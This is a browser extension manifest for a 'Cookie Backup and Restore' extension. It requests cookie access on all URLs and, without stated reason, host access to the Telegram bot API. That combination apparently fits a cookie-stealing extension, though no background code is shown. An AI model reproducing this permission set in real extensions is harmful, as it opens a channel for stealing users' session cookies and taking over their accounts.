{
  "name": "Cookie Backup and Restore",
  "version": "4.3",
  "description": "Backups and Encrypts all the cookies and Decrypts and Restores them when you need it.",
  "permissions": [
    "cookies",
    "downloads",
    "alarms",
    "storage"
  ],
  "host_permissions": [
    "<all_urls>",
    "https://api.telegram.org/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "icons": {
    "16": "icons/16.png",
    "48": "icons/48.png",
    "128": "icons/128.png"
  },
  "action": {
    "default_title": "Backup & restore your cookies!",
    "default_popup": "popup.html"
  },
  "manifest_version": 3
}